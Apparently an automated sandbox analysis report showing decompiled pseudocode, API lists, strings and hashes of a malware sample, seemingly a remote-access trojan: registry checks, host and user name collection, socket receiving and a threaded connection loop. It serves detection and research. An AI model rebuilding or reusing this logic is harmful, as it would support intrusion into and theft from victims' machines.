                    0x00448ed2
                    0x00448eda
                    0x00448ee1
                    0x00448ee4
                    0x00448ef1
                    0x00448ef8
                    0x00448ef9
                    0x00448efa
                    0x00448efb
                    0x00448f00
                    0x00448f0f
                    0x00448f16
                    0x00448f1e
                    0x00448f20
                    0x00448f2a
                    0x00448f2d
                    0x00448f3a
                    0x00448f3d
                    0x00448f3f
                    0x00448f58
                    0x00448f60
                    0x00448f62
                    0x00448f68
                    0x00448f6d
                    0x00448f64
                    0x00448f64
                    0x00000000
                    0x00448f64
                    0x00448f41
                    0x00448f41
                    0x00448f42
                    0x00448f42
                    0x00448f42
                    0x00448f6f
                    0x00448f22
                    0x00448f22
                    0x00448f22
                    0x00448f7c
                    0x00448f7e
                    0x00448f80
                    0x00448f82
                    0x00448f92
                    0x00448f92
                    0x00448f84
                    0x00448f84
                    0x00448f87
                    0x00000000
                    0x00448f89
                    0x00448f89
                    0x00448f8a
                    0x00448f8f
                    0x00448f87
                    0x00448f98
                    0x00448fa3
                    0x00448fae
                    0x00448da2
                    0x00448da6
                    0x00448dab
                    0x00448dac
                    0x00448dae
                    0x00000000
                    0x00448db4
                    0x00448db8
                    0x00448dbd
                    0x00448dbe
                    0x00448dc0
                    0x00000000
                    0x00448dc6
                    0x00448dcc
                    0x00448dd1
                    0x00448dd7
                    0x00448dde
                    0x00448de4
                    0x00448de7
                    0x00448ded
                    0x00448df4
                    0x00448dfa
                    0x00448dfe
                    0x00448e04
                    0x00448e07
                    0x00448e0e
                    0x00448e13
                    0x00448e13
                    0x00448e15
                    0x00448e15
                    0x00448e18
                    0x00448e1f
                    0x00448e37
                    0x00448e37
                    0x00448e3a
                    0x00448e21
                    0x00448e21
                    0x00448e26
                    0x00448e28
                    0x00000000
                    0x00448e2a
                    0x00448e2c
                    0x00448e32
                    0x00448e32
                    0x00448e28
                    0x00448e42
                    0x00448e56
                    0x00448e5c
                    0x00448e5e
                    0x00448e6c
                    0x00448e6e
                    0x00448e60
                    0x00448e60
                    0x00448e63
                    0x00000000
                    0x00448e65
                    0x00448e67
                    0x00448e67
                    0x00448e63
                    0x00448e83
                    0x00448e8a
                    0x00448e8c
                    0x00448e9b
                    0x00448e9e
                    0x00448e8e
                    0x00448e8e
                    0x00448e91
                    0x00000000
                    0x00448e93
                    0x00448e96
                    0x00448e96
                    0x00448e91
                    0x00448e8c
                    0x00448ea8
                    0x00448eb2
                    0x00448eb7
                    0x00448ebc
                    0x00448ec3
                    0x00448ec3
                    0x00448dc0
                    0x00448dae
                    0x00448bdf
                    0x00448bdf
                    0x00448be5
                    0x00448bea
                    0x00448c20
                    0x00448c21
                    0x00448c27
                    0x00448c29
                    0x00448c29
                    0x00448c2c
                    0x00448c2c
                    0x00448c2e
                    0x00448c2f
                    0x00448c35
                    0x00448c40
                    0x00448c45
                    0x00448c4a
                    0x00448c54
                    0x00000000
                    0x00448c5a
                    0x00448c5a
                    0x00448c5c
                    0x00448c5d
                    0x00448c5d
                    0x00448c60
                    0x00448c60
                    0x00448c62
                    0x00448c63
                    0x00448c6a
                    0x00448c6f
                    0x00448c74
                    0x00448c79
                    0x00448c81
                    0x00448c82
                    0x00448c88
                    0x00448c8d
                    0x00448c92
                    0x00448c98
                    0x00448c9d
                    0x00448c9e
                    0x00448ca1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00448ca1
                    0x00448ca6
                    0x00448ca7
                    0x00448cac
                    0x00448cae
                    0x00448cae
                    0x00448cb6
                    0x00448cbc
                    0x00448cbf
                    0x00448cbf
                    0x00448cc3
                    0x00000000
                    0x00000000
                    0x00448ccd
                    0x00448ccd
                    0x00448cd0
                    0x00448cd3
                    0x00448cd5
                    0x00448ce3
                    0x00448ce5
                    0x00448cef
                    0x00448cef
                    0x00448cf1
                    0x00448cf3
                    0x00000000
                    0x00000000
                    0x00448cea
                    0x00448cec
                    0x00448cee
                    0x00448cee
                    0x00000000
                    0x00448cee
                    0x00000000
                    0x00448cec
                    0x00448cf5
                    0x00448cf8
                    0x00448cfa
                    0x00448d05
                    0x00448d07
                    0x00448d11
                    0x00448d11
                    0x00448d13
                    0x00448d15
                    0x00000000
                    0x00000000
                    0x00448d0c
                    0x00448d0e
                    0x00448d10
                    0x00448d10
                    0x00000000
                    0x00448d10
                    0x00000000
                    0x00448d0e
                    0x00448d11
                    0x00448cf8
                    0x00448d17
                    0x00448d17
                    0x00448d19
                    0x00448d1d
                    0x00448d1d
                    0x00448d22
                    0x00448d24
                    0x00448d27
                    0x00448d2a
                    0x00448d2c
                    0x00448d2f
                    0x00448d47
                    0x00448d4a
                    0x00448d4d
                    0x00448d55
                    0x00448d5a
                    0x00448d5f
                    0x00000000
                    0x00448d5f
                    0x00448d31
                    0x00448d36
                    0x00448d39
                    0x00448d3e
                    0x00448d41
                    0x00448d43
                    0x00000000
                    0x00000000
                    0x00448d45
                    0x00448c92
                    0x00000000
                    0x00448c79
                    0x00448bec
                    0x00448bec
                    0x00448bee
                    0x00448bf0
                    0x00448bf0
                    0x00448bf4
                    0x00000000
                    0x00000000
                    0x00448bf8
                    0x00448c0c
                    0x00448c0c
                    0x00448bfa
                    0x00448bfa
                    0x00448bfa
                    0x00448c00
                    0x00000000
                    0x00448c02
                    0x00448c02
                    0x00448c05
                    0x00448c0a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00448c0a
                    0x00448c00
                    0x00448c15
                    0x00448c17
                    0x00448d66
                    0x00448d66
                    0x00448c1d
                    0x00448c1d
                    0x00000000
                    0x00448c1d
                    0x00000000
                    0x00448c17
                    0x00448c10
                    0x00448c12
                    0x00448c12
                    0x00000000
                    0x00448c12
                    0x00448bea
                    0x00000000

                    APIs
                    • _free.LIBCMT ref: 00448C21
                    • _free.LIBCMT ref: 00448C45
                    • _free.LIBCMT ref: 00448DCC
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E224), ref: 00448DDE
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00471764,000000FF,00000000,0000003F,00000000,?,?), ref: 00448E56
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717B8,000000FF,?,0000003F,00000000,?), ref: 00448E83
                    • _free.LIBCMT ref: 00448F98
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID: $E
                    • API String ID: 314583886-3852530544
                    • Opcode ID: d99d02b40ceb4de60fa72286ed4b1209b00bbcb8e94a2c9b9e4acc14c6ab9e21
                    • Instruction ID: 4c7c63986a6c642ca9b0ae75ec89985bdaf8973cbcd04ad1cb94e86654740c46
                    • Opcode Fuzzy Hash: d99d02b40ceb4de60fa72286ed4b1209b00bbcb8e94a2c9b9e4acc14c6ab9e21
                    • Instruction Fuzzy Hash: 63C137719002099FFB24AF798C41AAF7BA9EF51314F2441AFE485A7292EF388D41C75C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 56%
                    			E0040F5B0() {
                    				signed int _v32;
                    				void* _t13;
                    				void* _t22;
                    				char* _t34;
                    				void* _t63;
                    				signed int _t64;
                    				void* _t66;
                    				void* _t67;
                    				void* _t69;
                    
                    				_t66 = (_t64 & 0xfffffff8) - 0x1c;
                    				_t34 = L"pth_unenc";
                    				while(1) {
                    					_v32 = _v32 & 0x00000000;
                    					_t52 = E00401FAB(0x4742d8); // executed
                    					E004130F7(_t10, "override",  &_v32); // executed
                    					_t13 = _v32 - 1;
                    					if(_t13 == 0) {
                    						goto L5;
                    					}
                    					_t22 = _t13 - 1;
                    					if(_t22 == 0) {
                    						_t70 = _t66 - 0x1c;
                    						E00408F83(_t34, _t66 - 0x1c, _t52, __eflags, 0x4742c0);
                    						_push(_t34);
                    						E004133C2(0x80000001, E00401F04(E0041B6F3( &_v32, 0x4742d8)));
                    						E00401F09();
                    						_push(1);
                    						E00402093(_t34, _t70 + 0x20 - 0x18, _t25, _t63, "4.8.0 Pro");
                    						_push("v");
                    						E0041331D(0x4742d8, E00401FAB(0x4742d8));
                    						E00412659();
                    						ExitProcess(0);
                    					}
                    					_t77 = _t22 != 1;
                    					if(_t22 != 1) {
                    						L6:
                    						Sleep(0xbb8); // executed
                    						continue;
                    					}
                    					E0040CE9F();
                    					L5:
                    					_t67 = _t66 - 0x1c;
                    					E00408F83(_t34, _t67, _t52, _t77, 0x4742c0);
                    					_push(_t34);
                    					E004133C2(0x80000001, E00401F04(E0041B6F3( &_v32, 0x4742d8)));
                    					E00401F09();
                    					_push(1);
                    					_t69 = _t67 + 0x20 - 0x18;
                    					E00402093(_t34, _t69, _t16, _t63, "4.8.0 Pro");
                    					_push("v");
                    					E0041331D(0x4742d8, E00401FAB(0x4742d8));
                    					_t66 = _t69 + 0x20;
                    					goto L6;
                    				}
                    			}












                    0x0040f5b6
                    0x0040f5c6
                    0x0040f5cb
                    0x0040f5cb
                    0x0040f5e1
                    0x0040f5e3
                    0x0040f5ee
                    0x0040f5f1
                    0x00000000
                    0x00000000
                    0x0040f5f3
                    0x0040f5f6
                    0x0040f66f
                    0x0040f675
                    0x0040f67a
                    0x0040f694
                    0x0040f6a0
                    0x0040f6a5
                    0x0040f6b1
                    0x0040f6b6
                    0x0040f6c4
                    0x0040f6cc
                    0x0040f6d3
                    0x0040f6d3
                    0x0040f5f8
                    0x0040f5fb
                    0x0040f65f
                    0x0040f664
                    0x00000000
                    0x0040f664
                    0x0040f5fd
                    0x0040f602
                    0x0040f602
                    0x0040f608
                    0x0040f60d
                    0x0040f627
                    0x0040f633
                    0x0040f638
                    0x0040f63a
                    0x0040f644
                    0x0040f649
                    0x0040f657
                    0x0040f65c
                    0x00000000
                    0x0040f65c

                    APIs
                      • Part of subcall function 004130F7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413117
                      • Part of subcall function 004130F7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742D8), ref: 00413135
                      • Part of subcall function 004130F7: RegCloseKey.KERNEL32(?), ref: 00413140
                    • Sleep.KERNEL32(00000BB8), ref: 0040F664
                    • ExitProcess.KERNEL32 ref: 0040F6D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 4.8.0 Pro$override$pth_unenc
                    • API String ID: 2281282204-3110079519
                    • Opcode ID: 01e0d0313f5ea23c281a61b075d2d29c3a7af2f5b06977a488072be0c582b3ff
                    • Instruction ID: a4e61c65921bbda230003d713f062b8988a58bf9ae1cd36238d1c42b2e186ff1
                    • Opcode Fuzzy Hash: 01e0d0313f5ea23c281a61b075d2d29c3a7af2f5b06977a488072be0c582b3ff
                    • Instruction Fuzzy Hash: B121F131B1020167C6087A7A885BAAE36999B81B08F50053FF419A72D7FF7D9A0186DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1323 404f51-404f5f 1324 404f65-404f6c 1323->1324 1325 404fea 1323->1325 1326 404f74-404f7b 1324->1326 1327 404f6e-404f72 1324->1327 1328 404fec-404ff1 1325->1328 1329 404fc0-404fe8 CreateEventA CreateThread 1326->1329 1330 404f7d-404fbb GetLocalTime call 41b623 call 4052fd call 402093 call 41af84 call 401fd8 1326->1330 1327->1329 1329->1328 1330->1329
                    C-Code - Quality: 91%
                    			E00404F51(void* __ecx, intOrPtr _a4, char _a8) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t16;
                    				void* _t21;
                    				intOrPtr _t29;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t31 = __ecx;
                    				if( *((char*)(__ecx + 0x5c)) != 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t29 = _a4;
                    				if(_a8 != 0) {
                    					__eflags =  *0x471d48;
                    					if( *0x471d48 != 0) {
                    						GetLocalTime( &_v20);
                    						_t16 = E0041B623(_t21,  &_v44, _t29);
                    						_t34 = _t33 - 0x18;
                    						E004052FD(_t21, _t33 - 0x18, "KeepAlive             | Enabled | Timeout: ", _t32, __eflags, _t16);
                    						E00402093(_t21, _t34 - 0x14, "KeepAlive             | Enabled | Timeout: ", _t32, "i");
                    						E0041AF84(_t21, _t29);
                    						E00401FD8();
                    					}
                    				} else {
                    					 *((char*)(__ecx + 0x7c)) = 1;
                    				}
                    				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
                    				 *((char*)(_t31 + 0x5c)) = 1;
                    				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
                    				CreateThread(0, 0, E00405150, _t31, 0, 0); // executed
                    				return 1;
                    			}













                    0x00404f58
                    0x00404f5f
                    0x00404fea
                    0x00000000
                    0x00404fea
                    0x00404f69
                    0x00404f6c
                    0x00404f74
                    0x00404f7b
                    0x00404f81
                    0x00404f8c
                    0x00404f91
                    0x00404f9c
                    0x00404fab
                    0x00404fb0
                    0x00404fbb
                    0x00404fbb
                    0x00404f6e
                    0x00404f6e
                    0x00404f6e
                    0x00404fc0
                    0x00404fc9
                    0x00404fdd
                    0x00404fe0
                    0x00000000

                    APIs
                    • GetLocalTime.KERNEL32(00000001,00473EC8,00474580,?,?,?,?,004158E6,?,00000001), ref: 00404F81
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EC8,00474580,?,?,?,?,004158E6,?,00000001), ref: 00404FCD
                    • CreateThread.KERNEL32 ref: 00404FE0
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 2532271599-1507639952
                    • Opcode ID: 96d84177749fdf2295aa79b7f96fd704c41cec860a86a7abcba1726d12581990
                    • Instruction ID: b5d6523761b543d82c159ca6b5f57f26b109edac456abd744c52477afd98097a
                    • Opcode Fuzzy Hash: 96d84177749fdf2295aa79b7f96fd704c41cec860a86a7abcba1726d12581990
                    • Instruction Fuzzy Hash: 5D11C6719047846AD720A7B78C0DFAB7FA8DBD2714F04016FF541622D1DAB89446CBB6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 82%
                    			E0041B0A2(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v8;
                    				long _v12;
                    				char _v36;
                    				char _v60;
                    				char _v92;
                    				short _v604;
                    				void* __ebp;
                    				void* _t26;
                    				void* _t35;
                    				void* _t39;
                    				void* _t40;
                    				void* _t41;
                    
                    				_t41 = __eflags;
                    				_t35 = __edx;
                    				_v8 = 0x10;
                    				_t39 = __ecx;
                    				 *0x473b08(1,  &_v92,  &_v8); // executed
                    				_v12 = 0x100;
                    				GetUserNameW( &_v604,  &_v12); // executed
                    				E00403014(_t26, _t39, E004042FC(_t26,  &_v36,  &_v92, _t40, _t41, E0040417E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
                    				E00401F09();
                    				E00401F09();
                    				return _t39;
                    			}















                    0x0041b0a2
                    0x0041b0a2
                    0x0041b0af
                    0x0041b0ba
                    0x0041b0bf
                    0x0041b0c8
                    0x0041b0d7
                    0x0041b102
                    0x0041b10b
                    0x0041b113
                    0x0041b11e

                    APIs
                    • GetComputerNameExW.KERNEL32(00000001,?,0000002B,X2}), ref: 0041B0BF
                    • GetUserNameW.ADVAPI32(?,0040F02C), ref: 0041B0D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Name$ComputerUser
                    • String ID: X2}
                    • API String ID: 4229901323-1579876330
                    • Opcode ID: 0955c4e034b0cc40c45d1e2bdcd434fe26fb4029ee365a43723536341256100d
                    • Instruction ID: bda2248953657921d7c529135a5bb2893033efadff0af941220ad266f3cefbb3
                    • Opcode Fuzzy Hash: 0955c4e034b0cc40c45d1e2bdcd434fe26fb4029ee365a43723536341256100d
                    • Instruction Fuzzy Hash: EB012C7190011CAACB01EBD1DC45ADDB7BCAF44309F10016AB505B21A1EEB46A888A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00404B96(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                    				void* _t10;
                    				void* _t12;
                    				void* _t15;
                    				void* _t20;
                    
                    				_t15 = __ecx;
                    				_t20 = __ecx;
                    				if( *((char*)(__ecx + 1)) == 0) {
                    					_t9 = _t20 + 4; // 0xffffffff, executed
                    					__imp__#16( *_t9, _a4, _a8, 0); // executed
                    					return _t10;
                    				}
                    				_t2 = _t20 + 0x6c; // 0x0
                    				WaitForSingleObject( *_t2, 0xffffffff);
                    				_push(_t15);
                    				_t12 = E00420A94(_a4, _a8);
                    				_t6 = _t20 + 0x6c; // 0x0
                    				SetEvent( *_t6);
                    				return _t12;
                    			}







                    0x00404b96
                    0x00404b98
                    0x00404b9e
                    0x00404bd7
                    0x00404bda
                    0x00000000
                    0x00404bda
                    0x00404ba2
                    0x00404ba5
                    0x00404baf
                    0x00404bb7
                    0x00404bbe
                    0x00404bc3
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00473EE0,00404C49,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404BA5
                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                    • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventObjectSingleWaitrecv
                    • String ID:
                    • API String ID: 311754179-0
                    • Opcode ID: 8142943c3a85edbea1d3e67015f640589d8110b980a31432566d0c2592ebfd64
                    • Instruction ID: 0cb4bdc65d0d7585f4806b3150242dd216cfe208f7af7c5ee62565f3f3314616
                    • Opcode Fuzzy Hash: 8142943c3a85edbea1d3e67015f640589d8110b980a31432566d0c2592ebfd64
                    • Instruction Fuzzy Hash: 64F08236108612BFC7019B14EC09E4AFFA2FB84721F10822EF510622A0CF71FC20DB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00434565() {
                    				_Unknown_base(*)()* _t1;
                    
                    				_t1 = SetUnhandledExceptionFilter(E00434571); // executed
                    				return _t1;
                    			}




                    0x0043456a
                    0x00434570

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034571,00434298), ref: 0043456A
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 54d97b57c3bde015bb1299240252d604b3c559a750b684fe62a2900e5e5faaac
                    • Instruction ID: d2c7880fcdab5e28a93754c5d623cfb4b3e9c98f8e5c03434d168c0a824e897b
                    • Opcode Fuzzy Hash: 54d97b57c3bde015bb1299240252d604b3c559a750b684fe62a2900e5e5faaac
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 448 414b37-414b7f call 4020df call 41b348 call 4020df call 401e65 call 401fab call 43b4a1 461 414b81-414b88 Sleep 448->461 462 414b8e-414bda call 402093 call 401e65 call 4020f6 call 41b8b0 call 40489e call 401e65 call 40b832 448->462 461->462 477 414bdc-414c4b call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 462->477 478 414c4e-414ce9 call 402093 call 401e65 call 4020f6 call 41b8b0 call 401e65 * 2 call 406b45 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 462->478 477->478 531 414cf9-414d00 478->531 532 414ceb-414cf7 478->532 533 414d05-414d97 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41af84 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414af6 531->533 532->533 560 414de2-414df0 call 40482d 533->560 561 414d99-414ddd WSAGetLastError call 41c576 call 4052fd call 402093 call 41af84 call 401fd8 533->561 567 414df2-414e18 call 402093 * 2 call 41af84 560->567 568 414e1d-414e32 call 404f51 call 4048c8 560->568 583 4156b0-4156c2 call 404e26 call 4021fa 561->583 567->583 568->583 584 414e38-414f8b call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41af84 call 401fd8 * 4 call 41b275 call 4141ca call 408f83 call 441861 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4132a6 568->584 596 4156c4-4156e4 call 401e65 call 401fab call 43b4a1 Sleep 583->596 597 4156ea-4156f2 call 401e8d 583->597 648 414f8d-414f9a call 405aa6 584->648 649 414f9f-414fc6 call 401fab call 413154 584->649 596->597 597->478 648->649 655 414fc8-414fca 649->655 656 414fcd-415617 call 40417e call 40db92 call 41b6d7 call 41b7b3 call 41b623 call 401e65 GetTickCount call 41b623 call 41b57b call 41b623 * 2 call 41b52b call 41b7b3 * 5 call 40f6da call 41b7b3 call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 901 41561c-415623 656->901 902 415625-41562c 901->902 903 415637-41563e 901->903 902->903 904 41562e-415630 902->904 905 415640-415645 call 40aec6 903->905 906 41564a-41567c call 405a6b call 402093 * 2 call 41af84 903->906 904->903 905->906 917 415690-4156ab call 401fd8 * 2 call 401f09 906->917 918 41567e-41568a CreateThread 906->918 917->583 918->917
                    C-Code - Quality: 89%
                    			E00414B37() {
                    				char _v16;
                    				char _v40;
                    				char _v64;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v136;
                    				void* _v159;
                    				char _v160;
                    				char _v184;
                    				char _v208;
                    				char _v232;
                    				char _v256;
                    				char _v280;
                    				char _v304;
                    				char _v328;
                    				char _v352;
                    				char _v376;
                    				char _v400;
                    				char _v424;
                    				char _v448;
                    				char _v472;
                    				char _v496;
                    				char _v520;
                    				char _v544;
                    				char _v568;
                    				char _v592;
                    				char _v616;
                    				char _v640;
                    				char _v664;
                    				char _v688;
                    				char _v712;
                    				char _v736;
                    				char _v760;
                    				char _v784;
                    				char _v808;
                    				char _v832;
                    				char _v856;
                    				char _v880;
                    				char _v904;
                    				char _v928;
                    				char _v952;
                    				char _v976;
                    				char _v1000;
                    				char _v1024;
                    				char _v1048;
                    				char _v1072;
                    				char _v1096;
                    				char _v1120;
                    				char _v1144;
                    				char _v1168;
                    				char _v1192;
                    				char _v1216;
                    				char _v1240;
                    				char _v1264;
                    				char _v1288;
                    				char _v1312;
                    				char _v1336;
                    				char _v1360;
                    				char _v1384;
                    				char _v1408;
                    				char _v1432;
                    				char _v1456;
                    				char _v1480;
                    				char _v1504;
                    				char _v1528;
                    				char _v1552;
                    				char _v1576;
                    				char _v1600;
                    				char _v2604;
                    				signed int _t179;
                    				void* _t181;
                    				long _t186;
                    				void* _t188;
                    				void* _t191;
                    				void* _t199;
                    				char* _t210;
                    				void* _t212;
                    				void* _t213;
                    				struct _SECURITY_ATTRIBUTES* _t214;
                    				struct _SECURITY_ATTRIBUTES* _t216;
                    				void* _t218;
                    				long _t223;
                    				void* _t224;
                    				void* _t225;
                    				void* _t239;
                    				void* _t247;
                    				void* _t248;
                    				struct _SECURITY_ATTRIBUTES* _t251;
                    				intOrPtr* _t254;
                    				void* _t256;
                    				void* _t257;
                    				void* _t260;
                    				void* _t261;
                    				void* _t262;
                    				void* _t265;
                    				void* _t267;
                    				void* _t268;
                    				void* _t269;
                    				void* _t270;
                    				void* _t271;
                    				void* _t272;
                    				void* _t273;
                    				void* _t275;
                    				void* _t276;
                    				void* _t277;
                    				intOrPtr* _t382;
                    				void* _t398;
                    				void* _t404;
                    				void* _t406;
                    				void* _t408;
                    				void* _t410;
                    				char* _t412;
                    				long _t416;
                    				void* _t417;
                    				struct _SECURITY_ATTRIBUTES* _t418;
                    				char* _t446;
                    				char* _t490;
                    				void* _t683;
                    				void* _t695;
                    				intOrPtr _t703;
                    				void* _t755;
                    				signed short _t757;
                    				void* _t766;
                    				void* _t767;
                    				void* _t768;
                    				void* _t769;
                    				void* _t770;
                    				void* _t771;
                    				void* _t772;
                    				void* _t773;
                    				void* _t774;
                    				void* _t775;
                    				void* _t776;
                    				void* _t777;
                    				void* _t781;
                    				void* _t782;
                    				void* _t783;
                    				void* _t784;
                    				void* _t785;
                    				void* _t786;
                    				void* _t787;
                    				void* _t788;
                    				void* _t789;
                    				void* _t790;
                    				long _t792;
                    
                    				_push(_t417);
                    				_push(_t759);
                    				E004020DF(_t417,  &_v100);
                    				E0041B348( &_v280, _t683);
                    				E004020DF(_t417,  &_v1600);
                    				_t755 = 0x4740cc;
                    				_t179 = E0043B4A1(_t177, E00401FAB(E00401E65(0x4740cc, _t683, _t766, _t790, 0x29)));
                    				if(_t179 != 0) {
                    					_t416 = _t179 * 0x3e8;
                    					_t792 = _t416;
                    					Sleep(_t416);
                    				}
                    				_t768 = _t767 - 0x18;
                    				E00402093(_t417, _t768, _t683, _t766, 0x46b650);
                    				_t181 = E00401E65(_t755, _t683, _t766, _t792, 0);
                    				_t769 = _t768 - 0x18;
                    				E004020F6(_t417, _t769, _t683, _t792, _t181);
                    				E0041B8B0( &_v76, _t683);
                    				_t770 = _t769 + 0x30;
                    				_t418 = 0; // executed
                    				E0040489E(); // executed
                    				E00401E65(_t755, _t683, _t766, _t792, 0x38);
                    				_t684 = 0x465094;
                    				_t186 = E0040B832(_t792);
                    				_t793 = _t186;
                    				if(_t186 != 0) {
                    					E00401E65(_t755, 0x465094, _t766, _t793, 0x38);
                    					_t404 = E0040247C();
                    					_t406 = E00401FAB(E00401E65(_t755, 0x465094, _t766, _t793, 0x38));
                    					E00401E65(_t755, 0x465094, _t766, _t793, 0x37);
                    					_t408 = E0040247C();
                    					_t410 = E00401FAB(E00401E65(_t755, 0x465094, _t766, _t793, 0x37));
                    					E00401E65(_t755, 0x465094, _t766, _t793, 0x36);
                    					_t412 = E0040247C();
                    					_t759 = _t412;
                    					E00401FAB(E00401E65(_t755, _t684, _t766, _t793, 0x36));
                    					_t684 = _t412;
                    					E0040473D(0, _t412, _t766, _t410, _t408, _t406, _t404);
                    					_t770 = _t770 + 0x10;
                    				}
                    				L4:
                    				_t771 = _t770 - 0x18;
                    				 *0x4745b1 = 1;
                    				E00402093(_t418, _t771, _t684, _t766, 0x46b654);
                    				_t188 = E00401E65( &_v76, _t684, _t766, _t793, _t418);
                    				_t772 = _t771 - 0x18;
                    				E004020F6(_t418, _t772, _t684, _t793, _t188);
                    				E0041B8B0( &_v16, _t684);
